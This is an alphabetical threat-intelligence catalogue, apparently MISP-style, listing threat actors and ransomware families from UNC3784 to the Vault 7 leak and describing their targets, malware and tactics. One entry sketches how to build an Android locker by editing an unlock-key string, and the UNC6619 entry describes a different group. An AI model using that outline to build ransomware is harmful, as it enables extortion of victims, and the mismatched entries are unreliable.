UNC3784 is a suspected Chinese espionage actor, which - alongside other China-backed groups - was observed exploiting the "Follina" vulnerability (CVE-2022-30190) in zero-day attacks on organizations in Russia and Asia. UNC3784 specifically was observed deploying backdoor and downloader malware on compromised government networks in Southeast Asia.[[Mandiant M-Trends 2023](/references/fabb9f5c-3ce6-4eef-8711-13130ff41884)]

UNC3890

A suspected Iranian threat activity cluster has been linked to attacks aimed at Israeli shipping, government, energy, and healthcare organizations, in a campaign stretching back to late 2020. Researchers believe that the data harvested during the campaign could be used to support various activities. UNC3890, the threat actor behind the attacks, deployed two proprietary pieces of malware – a backdoor named “SUGARUSH” and a browser credential stealer called “SUGARDUMP”, which exfiltrates password information to email addresses registered with Gmail, ProtonMail, Yahoo and Yandex email services. The threat actor also employs a network of C&C servers that host fake login pages impersonating legitimate platforms such as Office 365, LinkedIn and Facebook. These servers are designed to communicate with the targets and also with a watering hole hosted on the login page of a legitimate Israeli shipping company.

UNC3966

UNC3966 is a threat actor group tracked by Mandiant. In an intrusion documented in March 2023, UNC3966 received access to a victim network initially compromised by the group UNC961. UNC3966's primary motivations remain unclear. During the intrusion, the group was observed collecting and exfiltrating victim data. While a ransom note was also discovered, UNC3966 did not appear to deploy ransomware encryption software and did not appear to demand a ransom payment.[[Mandiant UNC961 March 23 2023](/references/cef19ceb-179f-4d49-acba-5ce40ab9f65e)]

UNC3973

UNC3973 is a financially motivated threat actor tracked by Mandiant, distinguished from the broader BASTA ransomware ecosystem (primarily tracked as UNC4393) due to its unique operational characteristics and TTPs. This actor has demonstrated a specific focus on supply chain compromises, as evidenced by their June campaign targeting credit unions in western Canada via a compromised managed service provider (MSP). UNC3973 leverages unauthorized service accounts with elevated privileges, specifically domain administrator accounts shared between the compromised MSP and the target organizations, to gain initial access. This actor's post-exploitation activity includes attempts to disable security controls and deploy the SYSTEMBC tunneler for command and control (C2) communication, followed by attempts to deploy BASTA ransomware. While attempts to deploy both SYSTEMBC and BASTA have been observed, these were thwarted by endpoint security solutions in the observed instances. The targeted, supply chain-enabled nature of UNC3973's intrusions, coupled with its use of privileged shared accounts and attempts at deploying BASTA, all suggest that it is an exclusive group, perhaps even affiliates working closely with, or possibly operating under the direct control of, the BASTA ransomware operators. This group's ability to exploit centralized access points, like MSPs, represents a significant threat to organizations reliant on third-party providers.

UNC4191

UNC4191 is a China-linked threat actor that has been involved in cyber espionage campaigns targeting public and private sectors primarily in Southeast Asia. They have been known to use USB devices as an initial infection vector and have been observed deploying various malware families on infected systems. UNC4191's operations have also extended to the US, Europe, and the Asia Pacific Japan region, with a particular focus on the Philippines.

UNC4393

UNC4393 is a financially motivated threat actor primarily using BASTA ransomware. They have been active since early 2022 and have targeted over 40 organizations across various industries. UNC4393 has shown a willingness to cooperate with other threat clusters for initial access and has evolved from using existing tools to developing custom malware. They focus on efficient data exfiltration and multi-faceted extortion, often utilizing tools like COGSCAN and RCLONE for reconnaissance and data theft.

UNC4487

UNC4487 is a threat actor that targeted Ukrainian government officials by compromising a Ukrainian auto insurance website essential for official travel. This attack facilitated the distribution of the MATANBUCHUS malware, which was used to monetize access to infected systems. Mandiant later identified additional malware samples, referred to as ChillyHell, linked to UNC4487 through the reuse of a code signing certificate associated with MATANBUCHUS. The group's activities highlight a focus on exploiting critical infrastructure for financial gain.

UNC4536

UNC4536 is a threat actor that distributes malware, including ICEDID, REDLINESTEALER, and CARBANAK, primarily through malvertising and trojanized MSIX installers masquerading as popular software. They utilize SEO poisoning tactics to direct victims to malicious sites that mimic legitimate software hosting platforms, facilitating the download of compromised installers. The actor employs a PowerShell script known as NUMOZYLOD to deliver tailored payloads, such as the CARBANAK backdoor, to their partners. Additionally, UNC4536 has been linked to campaigns that distribute NetSupport RAT, targeting IT administrators through fake sites promoted via Google Ads.

UNC4540

UNC4540 is a suspected Chinese threat actor targeting unpatched SonicWall Secure Mobile Access appliances to deploy custom malware that establishes long-term persistence for cyber espionage. The malware is designed to steal hashed credentials, provide shell access, and persist through firmware upgrades, utilizing a variant of the TinyShell backdoor. Mandiant has tracked UNC4540's activities back to 2021, noting their focus on maintaining access to compromised devices. The group's tactics are consistent with patterns observed in other Chinese threat actor campaigns targeting network devices for zero-day exploits.

UNC4736

UNC4736 is a North Korean threat actor that has been involved in supply chain attacks targeting the 3CX and X_TRADER software supply chains. They have used malware strains such as TAXHAUL, Coldcat, and VEILEDSIGNAL to compromise Windows and macOS systems. UNC4736 has been linked to financially motivated cybercrime operations, particularly focused on cryptocurrency and fintech-related services. They have also demonstrated infrastructure overlap with other North Korean and APT43 activity.

UNC4841

UNC4841 is a well-resourced threat actor that has utilized a wide range of malware and purpose-built tooling to enable their global espionage operations. They have been observed selectively deploying specific malware families at high priority targets, with SKIPJACK being the most widely deployed. UNC4841 primarily targeted government and technology organizations, but they have also been observed targeting other verticals.

UNC4990

UNC4990 is a financially motivated threat actor that has been active since at least 2020. They primarily target users in Italy and rely on USB devices for initial infection. The group has evolved their tactics over time, using encoded text files on popular websites like GitHub and Vimeo to host payloads. They have been observed using sophisticated backdoors like QUIETBOARD and EMPTYSPACE, and have targeted organizations in various industries, particularly in Italy.

UNC5174

UNC5174, a Chinese state-sponsored threat actor, has been identified by Mandiant for exploiting critical vulnerabilities in F5 BIG-IP and ScreenConnect. They have been linked to targeting research and education institutions, businesses, charities, NGOs, and government organizations in Southeast Asia, the U.S., and the UK. UNC5174 is believed to have connections to China's Ministry of State Security and has been observed using custom tooling and the SUPERSHELL framework in their operations. The actor has shown indications of transitioning from hacktivist collectives to working as a contractor for Chinese intelligence agencies.

UNC5266

Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.

UNC5291

UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and was potentially interested in Ivanti Connect Secure devices for initial access.

UNC5325

UNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances. UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence. UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK. Mandiant identified TTPs and malware code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware leveraged by UNC3886. Mandiant assesses with moderate confidence that UNC5325 is associated with UNC3886.

UNC5330

UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence. Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021.

UNC5337

UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221.

UNC5342

UNC5342 is a North Korea-linked APT that employs the EtherHiding technique to deliver malware and facilitate cryptocurrency theft. The actor has been observed deploying EtherRAT and JADESNOW malware, utilizing transaction history as a Dead Drop Resolver to embed payloads directly into the calldata of blockchain transactions. Their operations involve leveraging centralized API services to interact with public blockchains like Ethereum and BNB Smart Chain. The malware is designed to exfiltrate sensitive data, particularly targeting cryptocurrency wallets and credentials.

UNC5537

UNC5537 is a financially motivated threat actor targeting Snowflake customer databases. They use stolen credentials obtained from infostealer malware to access and exfiltrate large volumes of data. The compromised accounts lack multi-factor authentication, allowing UNC5537 to conduct data theft and extortion.

UNC5820

UNC5820 is a threat actor exploiting the CVE-2024-47575 vulnerability in Fortinet's FortiManager, allowing them to bypass authentication and execute arbitrary commands. They have been observed exfiltrating configuration data, user information, and FortiOS256-hashed passwords from managed FortiGate devices. While the actor has staged and exfiltrated sensitive data, there is currently no evidence of lateral movement or further compromise of additional environments. Mandiant has not determined whether UNC5820 is state-sponsored or identified its geographic location.

UNC6032

UNC6032 is a threat actor that weaponizes interest in AI tools, specifically targeting users with fake "AI video generator" websites to distribute malware, including Python-based infostealers and backdoors. Victims are typically directed to these sites through malicious social media ads that impersonate legitimate tools. Compromises have led to the exfiltration of sensitive data, including login credentials and credit card information, via the Telegram API. Google Threat Intelligence Group assesses UNC6032 to have a Vietnam nexus.

UNC6040

UNC6040 is a financially motivated threat cluster that employs vishing to gain access to organizations' Salesforce environments, facilitating large-scale data exfiltration. The group manipulates end users into authorizing malicious connected apps, often masquerading as IT support personnel, to exploit OAuth permissions. Following initial access, UNC6040 leverages harvested credentials to move laterally within victim networks, targeting other cloud platforms like Okta and Microsoft 365. Their operations are characterized by the use of Mullvad VPN IP addresses and a focus on social engineering tactics to bypass security measures.

UNC6148

UNC6148 is a financially motivated threat actor that targets SonicWall Secure Mobile Access 100 series appliances, leveraging stolen credentials and possibly zero-day exploits to deploy a persistent backdoor known as OVERSTEP. They utilize a kernel-level rootkit for stealthy access and have been observed establishing SSL VPN sessions to launch reverse shells and manipulate system files. The actor's operations include credential theft, data exfiltration, and potential ransomware deployment, with evidence suggesting they modify legitimate scripts to maintain persistence. Their activities are characterized by the reuse of OTP seeds and admin credentials, allowing continued access even after security patches are applied.

UNC6201

UNC6201 is a sophisticated Chinese state-sponsored hacking group that exploited CVE-2026-22769, a critical vulnerability in Dell RecoverPoint for Virtual Machines appliances, to establish a persistent presence. They deployed a permanent backdoor using techniques like Single Packet Authorization and "Port Knocking." Unlike typical hackers who conceal their activities within the operating system, UNC6201 operated at the virtualization layer to avoid detection.

UNC6293

UNC6293 is a Russian state-sponsored threat actor identified by Google's Threat Intelligence Group (GTIG), which associates them with APT29 with low confidence. They have conducted campaigns utilizing social engineering tactics, including leveraging App-Specific Passwords for account compromises. GTIG has also noted a second campaign by UNC6293 that incorporates Ukrainian themes.

UNC6353

Suspected Russian espionage group.

UNC6384

UNC6384 (also tracked as Vertigo Panda) is a Chinese-affiliated APT that conducts targeted espionage campaigns primarily against diplomatic entities in Southeast Asia and Europe, specifically Belgium and Hungary. The group exploits the ZDI-CAN-25373 Windows shortcut vulnerability to gain initial code execution via malicious .LNK files, deploying the PlugX RAT through sophisticated delivery mechanisms, including DLL side-loading and adversary-in-the-middle attacks. Their operations involve social engineering tactics, such as spear-phishing emails themed around diplomatic events, to entice victims into executing malicious payloads. UNC6384's use of valid code signing and HTTPS hosting enhances their evasion of detection and increases the likelihood of user interaction.

UNC6395

The actor systematically exported large volumes of data from numerous corporate Salesforce instances. GTIG assesses the primary intent of the threat actor is to harvest credentials. After the data was exfiltrated, the actor searched through the data to look for secrets that could potentially be used to compromise victim environments. GTIG observed UNC6395 targeting sensitive credentials such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens. UNC6395 demonstrated operational security awareness by deleting query jobs; however, logs were not affected, and organizations should still review relevant logs for evidence of data exposure.

UNC6426

UNC6426 exploited a supply chain compromise of the nx npm package to steal a developer's GitHub Personal Access Token and gain access to a victim's cloud environment. They abused the GitHub-to-AWS OpenID Connect trust to create a new administrator role, leveraging overly permissive permissions associated with the compromised GitHub-Actions-CloudFormation role. Using the legitimate open-source tool Nord Stream, UNC6426 conducted reconnaissance and extracted secrets from CI/CD environments, leading to the exfiltration of files from AWS S3 buckets and data destruction. The actor escalated to full AWS administrator permissions in under 72 hours.

UNC6485

UNC6485 is a cyber-espionage group exploiting CVE-2025-12480 in Gladinet’s Triofox file-sharing platform to gain initial network access and establish long-term persistence. They create unauthorized administrative accounts and deploy RATs, utilizing legitimate tools like Zoho Assist and AnyDesk to evade detection. Their TTPs indicate a sophisticated understanding of the platform, allowing them to blend malicious activities with legitimate administrative actions.

UNC6619

TGR-STA-1030 is a state-aligned cyberespionage group operating out of Asia, known for compromising government and critical infrastructure organizations across 37 countries. The group frequently deploys web shells, such as Behinder, Neo-reGeorg, and Godzilla, on both external and internal web servers to maintain access and enable lateral movement. TGR-STA-1030 has conducted extensive reconnaissance against government infrastructure, particularly focusing on nations in the South China Sea and Gulf of Thailand regions, as well as European countries like Germany. The group primarily targets government ministries and departments for espionage purposes, especially those exploring specific economic partnerships.

UNC6671

UNC6671 is involved in credential harvesting operations, utilizing vishing tactics to impersonate IT staff and directing victims to enter credentials on a victim-branded site. They have gained access to Okta customer accounts and employed PowerShell to download sensitive data from SharePoint and OneDrive. Their extortion tactics include aggressive harassment of victim personnel, and they have used unbranded extortion emails with different Tox IDs for communication. The threat actors have shown a preference for registering domains with Tucows, indicating potential operational differences from related threat groups.

UNC6691

Financially motivated threat actor operating from China.

UNC6692

UNC6692 is a threat actor that employs social engineering tactics, such as impersonating IT helpdesk personnel, to gain initial access to victim environments. They utilize a custom modular malware suite, including components like SNOWBELT, SNOWGLAZE, and SNOWBASIN, to facilitate deep network penetration and lateral movement. After extracting credentials from the LSASS process memory, they leverage Pass-The-Hash techniques to authenticate to domain controllers and exfiltrate sensitive data using LimeWire. The campaign highlights the systematic abuse of legitimate cloud services for payload delivery and command-and-control infrastructure.

UNC6748

UNC6748 targets users in Saudi Arabia through a fake Snapchat website, employing a backdoor known as GHOSTKNIFE for data exfiltration. Their exploitation process initially featured basic obfuscation, which evolved to include anti-debugging measures. The actor primarily leveraged CVE-2025-31277 and CVE-2026-20700 for RCE exploits, but exhibited inconsistencies in exploit support for different iOS versions. Additionally, UNC6748's delivery mechanisms incorporated session storage checks to manage infection attempts.

Unfading Sea Haze

Unfading Sea Haze is a threat actor focused on espionage, targeting government and military organizations in the South China Sea region since 2018. They employ spear-phishing emails with malicious attachments to gain initial access, followed by the deployment of custom malware such as Gh0st RAT variants and SharpJSHandler. The group utilizes scheduled tasks and manipulates local administrator accounts for persistence, while also incorporating Remote Monitoring and Management tools into their attacks. Unfading Sea Haze demonstrates a sophisticated and patient approach, remaining undetected for years and showing adaptability through evolving exfiltration tactics and malware arsenal.

UNG0002

UNG0002 is a technically adept APT conducting large-scale cyber espionage campaigns targeting strategic sectors in China, Hong Kong, and Pakistan, including defense, energy infrastructure, and healthcare. The group employs LNK shortcuts, VBScript files, and tools like Cobalt Strike and Metasploit, utilizing phishing emails with deceptive documents to lure victims. Their malware, such as Shadow RAT, leverages DLL Sideloading and supports remote command execution, making detection challenging. Analysts suggest that UNG0002 may originate from South or Southeast Asia, highlighting their resilience and adaptability in cyber operations.

UNG0901

UNG0901 is a cyber-espionage threat actor targeting Russian entities, particularly in the aerospace and defense sectors, utilizing spear-phishing tactics. They deploy the EAGLET backdoor, which exhibits functionalities similar to the Golang-based PhantomDL used by the Head Mare group, including shell, download, and upload capabilities. Notable overlaps in file-naming conventions and targeting strategies further reinforce the connection between UNG0901 and Head Mare.

Ungluk

Ransomware. The ransom note instructs the victim to use Bitmessage to get in contact with the attacker. Associated names: Secretishere.key, SECRETISHIDINGHEREINSIDE.KEY, secret.key.

Unidad de Inteligencia Financiera (Argentina)

Financial Intelligence Unit (UIF) – Unidad de Inteligencia Financiera

Unikey

ransomware

UNION PANDA

UNION PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

UNION SPIDER

Adversary targeting manufacturing and industrial organizations.

Unit 8200

Unit 8200 is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

United Front Work Department

United Front Work Department (UFWD)

UNK_AcademicFlare

UNK_AcademicFlare is a suspected Russia-aligned threat actor that conducts device code phishing campaigns by leveraging compromised email addresses from government and military organizations. The actor engages in rapport building through benign outreach, ultimately leading to a phishing attempt via a Cloudflare Worker URL that spoofs a OneDrive account. Targeted sectors include government, think tanks, higher education, and transportation in the U.S. and Europe, with a focus on Russia and Ukraine-themed content. Their tactics include using compromised accounts for initial contact and employing device code phishing techniques to extract credentials.

UNK_DropPitch

Between March and June 2025, Proofpoint identified multiple China-aligned threat actors specifically targeting Taiwanese organizations within the semiconductor industry. This included a China-aligned threat actor tracked as UNK_FistBump targeting semiconductor design, manufacturing, and supply chain organizations in employment-themed phishing campaigns resulting in the delivery of Cobalt Strike or the custom Voldemort backdoor. Additionally, Proofpoint observed another China-aligned threat actor tracked as UNK_DropPitch targeting individuals in multiple major investment firms who specialize in investment analysis specifically within the Taiwanese semiconductor industry. This UNK_DropPitch targeting is exemplary of intelligence collection priorities spanning less obvious areas of the semiconductor ecosystem beyond just design and manufacturing entities. Finally, we also observed an actor tracked as UNK_SparkyCarp conducting credential phishing activity against a Taiwanese semiconductor company using a custom Adversary in the Middle (AiTM) phishing kit.

UNK_FistBump

Between March and June 2025, Proofpoint identified multiple China-aligned threat actors specifically targeting Taiwanese organizations within the semiconductor industry. This included a China-aligned threat actor tracked as UNK_FistBump targeting semiconductor design, manufacturing, and supply chain organizations in employment-themed phishing campaigns resulting in the delivery of Cobalt Strike or the custom Voldemort backdoor. Additionally, Proofpoint observed another China-aligned threat actor tracked as UNK_DropPitch targeting individuals in multiple major investment firms who specialize in investment analysis specifically within the Taiwanese semiconductor industry. This UNK_DropPitch targeting is exemplary of intelligence collection priorities spanning less obvious areas of the semiconductor ecosystem beyond just design and manufacturing entities. Finally, we also observed an actor tracked as UNK_SparkyCarp conducting credential phishing activity against a Taiwanese semiconductor company using a custom Adversary in the Middle (AiTM) phishing kit.

UNK_RemoteRogue

UNK_RemoteRogue is a suspected Russian threat actor that has been observed utilizing ClickFix in its infection chains, although this technique is not revolutionizing their operations but rather replacing existing installation methods. The group has a history of employing compromised intermediate mailservers, with specific infrastructure noted, such as the upstream concentrator at 80.66.66[.]197. Proofpoint recorded their use of ClickFix only once before they reverted to traditional campaigns that share similar characteristics, including targeting and infrastructure. UNK_RemoteRogue has been linked to phishing activities and has shown consistent patterns in its operational tactics.

UNK_SparkyCarp

Between March and June 2025, Proofpoint identified multiple China-aligned threat actors specifically targeting Taiwanese organizations within the semiconductor industry. This included a China-aligned threat actor tracked as UNK_FistBump targeting semiconductor design, manufacturing, and supply chain organizations in employment-themed phishing campaigns resulting in the delivery of Cobalt Strike or the custom Voldemort backdoor. Additionally, Proofpoint observed another China-aligned threat actor tracked as UNK_DropPitch targeting individuals in multiple major investment firms who specialize in investment analysis specifically within the Taiwanese semiconductor industry. This UNK_DropPitch targeting is exemplary of intelligence collection priorities spanning less obvious areas of the semiconductor ecosystem beyond just design and manufacturing entities. Finally, we also observed an actor tracked as UNK_SparkyCarp conducting credential phishing activity against a Taiwanese semiconductor company using a custom Adversary in the Middle (AiTM) phishing kit.

Unknown Crypted

ransomware

Unknown Lock

ransomware

Unknown XTBL

ransomware

Unknown

Unknown is an active extortion or ransomware group tracked by RansomLook.

Unlckr

ransomware

Unlock26 Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Unlock92

Ransomware

UnluckyWare

ransomware

UNNAM3D

ransomware

Unnamed Actor

This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activists. The threat actor also targeted the Myanmar electoral commission.

Unnamed Android Ransomware

Uses APK Editor Pro. Picks and activates DEX>Smali from APK Editor. Utilizes the LockService application and edits the "const-string v4, value" to a desired unlock key. Changes contact information within the ransom note. Once the victim has downloaded the malicious app, the only way to recover their content is to pay the ransom and receive the unlock key.

Unnamed Bin

ransomware

[Unnamed group]

Over the last few weeks, several significant leaks regarding a number of Iranian APTs took place. After analyzing and investigating the documents we conclude that they are authentic. Consequently, this causes considerable harm to the groups and their operation. The identity of the actor behind the leak is currently unknown; however, based on the scope and the quality of the exposed documents and information, it appears that they are professional and highly capable. This leak will likely hamstring the groups' operation in the near future. Accordingly, in our assessment this will minimize the risk of potential attacks in the next few months and possibly even year.

Note: most of the leaks are posted on Telegram channels that were created specifically for this purpose. Below are the three main Telegram groups on which the leaks were posted:

Lab Dookhtegam pseudonym ("The people whose lips are stitched and sealed", translation from Persian): in this channel attack tools attributed to the group 'OilRig' were leaked, including a webshell that was inserted into the Technion, various tools that were used for DNS attacks, and more.

Green Leakers: in this channel attack tools attributed to the group 'MuddyWater' were leaked. The group's name and its symbol are identified with the "green movement", which led the protests in Iran after the presidential elections in 2009. These protests were heavily repressed by the Revolutionary Guards (IRGC).

Black Box: unlike the previous two channels, this one has been around for a long time. On Friday May 5th, dozens of confidential documents labeled as "secret" (a high confidentiality level in Iran, one before the highest, top secret) were posted on this channel. The documents were related to Iranian attack groups' activity.

Unnamed ransomware 1

A new in-development ransomware was discovered that has an interesting characteristic. Instead of the distributed executable performing the ransomware functionality itself, the executable compiles an embedded encrypted C# program at runtime and launches it directly into memory.

Unrans

ransomware

Unsafe

Unsafe is an active extortion or ransomware group tracked by RansomLook.

UnsolicitedBooker

UnsolicitedBooker is a China-aligned APT group known for its persistent targeting of an unnamed international organization in Saudi Arabia, employing a backdoor called MarsSnake. The group utilizes spear-phishing emails, often featuring flight tickets as decoys, to infiltrate governmental organizations across Asia, Africa, and the Middle East. Their operations have included multiple intrusion attempts over several years, demonstrating a sustained interest in their target. MarsSnake provides significant control over infected machines, allowing for arbitrary command execution and file access.

UpdateHost Ransomware

It is directed at English-speaking users and is therefore able to infect users worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. It poses as "Microsoft Copyright 2017" and requests a ransom in bitcoins.

Urpage

What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages. However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats. Trend Micro covered the Delphi component in the context of the Confucius and Patchwork connection. They mentioned Urpage as a third unnamed threat actor connected to the two.

USDoD

USDoD is a threat actor known for leaking large databases of personal information, including from companies like Airbus and the U.S. Environmental Protection Agency. They have a history of engaging in high-profile data breaches, such as exposing data from the FBI's InfraGard program. USDoD has also been involved in web scraping to obtain information from websites like LinkedIn.

UselessDisk

ransomware

UselessFiles

ransomware

UserFilesLocker Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

UserSec

UserSec is a pro-Russian hacking group that has been active since at least 2022. The group is known for its DDoS attacks and has collaborated with other pro-Russian hacking groups. In May 2023, UserSec announced a cyber campaign targeting NATO member states and joined forces with KillNet to launch attacks against NATO.

USR0

ransomware

UTA0178

While Volexity largely observed the attacker essentially living off the land, they still deployed a handful of malware files and tools during the course of the incident, which primarily consisted of webshells, proxy utilities, and file modifications to allow credential harvesting. Once UTA0178 had access to the network via the ICS VPN appliance, their general approach was to pivot from system to system using compromised credentials. They would then further compromise credentials of users on any new system that was breached, and use these credentials to log into additional systems via RDP. Volexity observed the attacker obtaining credentials in a variety of ways.

UTA0218

UTA0218 is a threat actor with advanced capabilities, targeting organizations to establish a reverse shell, acquire tools, and extract data. They exploit vulnerabilities in firewall devices to move laterally within victim networks, focusing on obtaining domain backup keys and active directory credentials. The actor deploys a custom Python backdoor named UPSTYLE to execute commands and download additional tools. UTA0218 is likely state-backed, utilizing a mix of infrastructure including VPNs and compromised routers to store malicious files.

UTA0352

UTA0352 is a Russian threat actor attributed to phishing campaigns that exploit Microsoft OAuth 2.0 authentication workflows, often impersonating government officials to lure targets into providing sensitive information. The actor has been observed using malicious URLs disguised as legitimate services, such as a Romanian government authentication system. UTA0352 has also targeted Microsoft Teams and employed social engineering tactics via messaging platforms like Signal and WhatsApp. Volexity assesses with medium confidence that UTA0352 is involved in operations themed around Ukraine, targeting individuals and organizations historically associated with Russian threat activities.

UTA0355

UTA0355 is a Russian threat actor that conducts phishing campaigns targeting individuals and organizations associated with Ukraine. The actor initiates contact via email, inviting targets to a video conference, and follows up through Signal or WhatsApp to enhance legitimacy. After establishing communication, UTA0355 prompts victims to log in via a malicious M365 URL, subsequently requesting approval for a 2FA authentication to access email data. Volexity assesses with high confidence that UTA0355 successfully registered devices and downloaded email data from compromised accounts.

UTA0388

UTA0388 is a China-aligned APT known for spear-phishing campaigns targeting organizations in North America, Asia, and Europe, primarily to deliver a Go-based implant called GOVERSHELL. The group employs "rapport-building phishing" tactics, engaging targets in benign conversations before sending malicious links, and has been linked to the use of Large Language Models for crafting phishing emails in multiple languages. Technical analysis indicates that UTA0388 operates in the interests of the Chinese state, with a focus on Asian geopolitical issues, as evidenced by the use of Simplified Chinese in its development environment. Volexity assesses that UTA0388's operations reflect a sophisticated blend of traditional phishing techniques and modern automation.

UTG-Q-008

UTG-Q-008 is a threat actor targeting Linux platforms, primarily focusing on government and enterprise entities in China. They utilize a massive botnet network for espionage activities, including reconnaissance, brute-forcing, and Trojan component delivery. The actor has a history of compromising thousands of servers in China using a password dictionary based on Chinese Pinyin. UTG-Q-008 operates during standard working hours in the UTC+8 time zone, with potential ties to Eastern Europe.

UTG-Q-010

UTG-Q-010 is a financially motivated APT group from East Asia that has been active since late 2022, primarily targeting the pharmaceutical industry and cryptocurrency enthusiasts. They exploit legitimate Windows processes, such as "WerFault.exe," to sideload malicious DLLs like "faultrep.dll" and employ sophisticated phishing campaigns to deliver malware disguised as enticing content. Their recent campaigns have involved the use of the Pupy RAT and advanced defense evasion techniques, including in-memory execution and reflective DLL loading. UTG-Q-010's strategic focus on HR departments and the cryptocurrency sector highlights their understanding of target vulnerabilities and their ability to evade detection.

V Is Vendetta

V Is Vendetta is an active extortion or ransomware group tracked by RansomLook.

V8Locker Ransomware

It is aimed at English-speaking users and can therefore infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

Vaca

ransomware

Vaggen

ransomware

valencia leaks

Official twitter account: https://x.com/ValenciaLeaks72

Vandev

Vandev is an active extortion or ransomware group tracked by RansomLook.

Vanguard Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hackers spread the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. This ransomware poses as MS Office to fool users into opening the infected file. GO Ransomware

vanhelsing

Designed to target Windows systems, this ransomware employs advanced encryption techniques and appends a unique file extension to compromised files. Its stealthy evasion tactics and persistence mechanisms make detection and removal challenging. This highlights the need for proactive cybersecurity measures and a robust incident response strategy to safeguard data integrity and minimize breach risks.

Vanilla Tempest

Vice Society is a ransomware group that has been active since at least June 2021. They primarily target the education and healthcare sectors, but have also been observed targeting the manufacturing industry. The group has used multiple ransomware families and has been known to utilize PowerShell scripts for their attacks. There are similarities between Vice Society and the Rhysida ransomware group, suggesting a potential connection or rebranding.

Vanir Group

Vanir Group is an active extortion or ransomware group tracked by RansomLook.

VapeLauncher

Ransomware CryptoWire variant

Vapor Ransomware

MalwareHunterTeam discovered the Vapor Ransomware, which appends the .Vapor extension to encrypted files. It will delete files if the ransom is not paid in time.

Vasalocker

Vasalocker is an active extortion or ransomware group tracked by RansomLook.

[Vault 7/8]

An unnamed source leaked almost 10,000 documents describing a large number of 0-day vulnerabilities, methodologies and tools that had been collected by the CIA. The leaking was done through WikiLeaks, starting in March 2017. In weekly publications, the dumps were said to come from Vault 7 and later Vault 8, until the leaker's arrest in 2018. Most of the published vulnerabilities have since been fixed by the respective vendors, but many have been used by other threat actors. This actor turned out to be a former CIA software engineer. (WikiLeaks) Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency. The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virginia. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election. Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. "Year Zero" introduces the scope and direction of the CIA's global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, including Apple's iPhone, Google's Android and Microsoft's Windows and even 